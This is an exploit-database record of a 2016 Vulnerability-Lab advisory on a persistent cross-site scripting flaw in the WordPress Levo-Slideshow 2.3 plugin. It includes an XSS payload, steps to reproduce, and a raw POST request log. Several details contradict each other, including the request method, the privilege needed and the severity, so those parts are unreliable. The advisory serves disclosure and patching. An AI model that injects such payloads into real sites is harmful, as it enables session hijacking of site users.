{"id": "PACKETSTORM:137356", "type": "packetstorm", "bulletinFamily": "exploit", "title": "WordPress Levo-Slideshow 2.3 Cross Site Scripting", "description": "", "published": "2016-06-08T00:00:00", "modified": "2016-06-08T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/137356/WordPress-Levo-Slideshow-2.3-Cross-Site-Scripting.html", "reporter": "Aaditya Purani", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:26:14", "viewCount": 6, "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2016-11-03T10:26:14", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:26:14", "rev": 2}, "vulnersScore": -0.2}, "sourceHref": "https://packetstormsecurity.com/files/download/137356/VL-1855.txt", "sourceData": "`Document Title: \n=============== \nWordpress Levo-Slideshow v2.3 - Persistent Vulnerability \n \n \nReferences (Source): \n==================== \nhttp://www.vulnerability-lab.com/get_content.php?id=1855 \n \n \nRelease Date: \n============= \n2016-06-06 \n \n \nVulnerability Laboratory ID (VL-ID): \n==================================== \n1855 \n \n \nCommon Vulnerability Scoring System: \n==================================== \n2.5 \n \n \nProduct & Service Introduction: \n=============================== \nMake sure you have a Levo slideshow a very effective technique to display unlimited number of product images within a single \nbox and just takes only few minutes to accomplish without getting too much into coding. No WP slider plugin has become as \nwide-spread and as popular recently as this particular free WP Levo slider, offering a marvelous method for displaying a lot \nof content in such a minimal space, and to mention also a great way to highlight your best and most popular product images \nor articles in an enhanced way. And on top off all that, this indispensable, yet smooth and free WP slider plugin is incorporated \nwith amazing set of features including a colossal space set aside to main flash image, a miniature sized image, image reflection \noption, description box with title, navigation arrows, auto-play/pause button, auto play timer into your WP powered websites or blogs. \n \n(Copy of the Homepage: http://wpslideshow.com/levo-slidehsow/ ) \n \n \nAbstract Advisory Information: \n============================== \nAn independent Vulnerability Laboratory Researcher discovered a persistent cross site scripting vulnerability in the official Levo-Slideshow v2.3 wordpress plugin. \n \n \nVulnerability Disclosure Timeline: \n================================== \n2016-06-06: Public Disclosure (Aaditya Purani) \n \n \nDiscovery Status: \n================= \nPublished \n \n \nAffected Product(s): \n==================== \nGo Responsive (Themes) \nProduct: Levo-Slideshow - Wordpress Plugin (Web-Application) 2.3 \n \n \nExploitation Technique: \n======================= \nRemote \n \n \nSeverity Level: \n=============== \nLow \n \n \nTechnical Details & Description: \n================================ \nA persistent cross site scripting web vulnerabilities has been discovered in the official Levo-Slideshow v2.3 wordpress plugin. \nThe client-side validation issue allows remote attacker to inject client-side script codes to compromise browser to application requests. \n \nThe vulnerability is located in the `image_description`parameter of the `Lenvo Image Upload` module. Remote attackers are able to inject \nclient-side script code. The `image_description` value is wrong encoded and not filtered by the regular validation. The attack vector of \nthe issue is client-side and the request method to execute is GET. \n \nThe security risk of the client-side vulnerabilities is estimated as medium with a cvss (common vulnerability scoring system) count of 2.5. \nExploitation of the security vulnerability requires no a privileged web-application user account and low user interaction. \nSuccessful exploitation of the vulnerabilities results in session hijacking, non-persistent phishing, non-persistent external redirects, \nnon-persistent load of malicious script codes or non-persistent web module context manipulation. \n \nRequest Method(s): \n[+] POST \n \nVulnerable Input(s): \n[+] Image Title \n[+] Image Description \n \nAffected Module(s): \n[+] Edit Post \n \n \nProof of Concept (PoC): \n======================= \nThe persistent cross site scripting vulnerability can be exploited by remote attackers without user interaction and with an uprivileged application user account. \nFor security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. \n \n \nPoC: Payload \nt\" onmouseover=alert(document.domain); a=' \n \n \nManual steps to reproduce the vulnerability ... \n1. Go to Levo Slideshow and click to Manage Images \n2. Add an Image \nInclude to the Image Title input and script code payload enter the payload as follows \nNote: t\" onmouseover=alert(document.domain); a=' \n3. Save it and Reload the Page and Game over. :) \n \n \n--- PoC Session Logs [POST] --- \n$GET: http://localhost:8080/wordpress/wp-admin/ \nHost: localhost:8080 \nUser-Agent: {Some User-Agent} \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: http://localhost:8080/wordpress/wp-content/plugins/wp-levoslideshow/html/edit_image.php?album_id=1&lvo_image_id=2&KeepThis=true& \nCookie: {USERS COOKIE} \nConnection: keep-alive \nContent-Type: multipart/form-data; boundary= \n---------------------------5673975277815470452141444322 \nContent-Length: 1370 \nIf-Modified-Since: * \n$POST : \n-----------------------------5673975277815470452141444322rn \nContent-Disposition: form-data; name=\"task\"rn \nrn \nlvo_single_image_uploadrn \n-----------------------------5673975277815470452141444322rn \nContent-Disposition: form-data; name=\"TB_iframe\"rn \nrn \n1rn \n-----------------------------5673975277815470452141444322rn \nContent-Disposition: form-data; name=\"album_id\"rn \nrn \n1rn \n-----------------------------5673975277815470452141444322rn \nContent-Disposition: form-data; name=\"image_id\"rn \nrn \n2rn \n-----------------------------5673975277815470452141444322rn \nContent-Disposition: form-data; name=\"image_thumb\"rn \nrn \ngeneratern \n-----------------------------5673975277815470452141444322rn \nContent-Disposition: form-data; name=\"image_title\"rn \nrn \nt\" onmouseover=alert(document.domain); a='rn \n-----------------------------5673975277815470452141444322rn \nContent-Disposition: form-data; name=\"image_description\"rn \nrn \nt\" onmouseover=alert(document.domain); a='rn \n-----------------------------5673975277815470452141444322rn \nContent-Disposition: form-data; name=\"image_link\"rn \nrn \nrn \n-----------------------------5673975277815470452141444322rn \nContent-Disposition: form-data; name=\"thumb_link\"rn \nrn \nrn \n-----------------------------5673975277815470452141444322rn \nContent-Disposition: form-data; name=\"image_file\"; filename=\"\"rn \nContent-Type: application/octet-streamrn \nrn \nrn \n-----------------------------5673975277815470452141444322--rn \n \n \nNote: After this gets saved, Go to http://localhost:8080/wordpress/wp-admin/admin.php?page=levoslideshow_manage&view=manage_album&album_id={Your Album where you saved} \nAnd than Click on Edit, it will Trigger :) .Click the dit button to trigger the payload execution. \n \n \nSolution - Fix & Patch: \n======================= \nThe vulnerability can be patched by a secure parse and encode of the vulnerable marked input fields. \nEncode all inputs and restrict the input by disallowing the usage of special chars to prevent application-side injection attacks. \n \n \nSecurity Risk: \n============== \nThe security risk of the persistent cross site scripting web vulnerability in the wordpress plugin is estimated as low. (CVSS 2.5) \n \n \nCredits & Authors: \n================== \nAaditya Purani - (https://aadityapurani.com) [http://www.vulnerability-lab.com/show.php?user=Aaditya%20Purani] \n \n \nDisclaimer & Information: \n========================= \nThe information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, \nincluding the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, \nincluding direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised \nof the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing \nlimitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. \n \nDomains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com \nContact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com \nSection: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact \nSocial: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab \nFeeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php \nPrograms: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php \n \nAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically \nredistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or \nits suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific \nauthors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission. \n \nCopyright \u00a9 2016 | Vulnerability Laboratory - [Evolution Security GmbH]\u2122 \n \n \n \n \n-- \nVULNERABILITY LABORATORY - RESEARCH TEAM \nSERVICE: www.vulnerability-lab.com \nCONTACT: research@vulnerability-lab.com \n \n`\n"}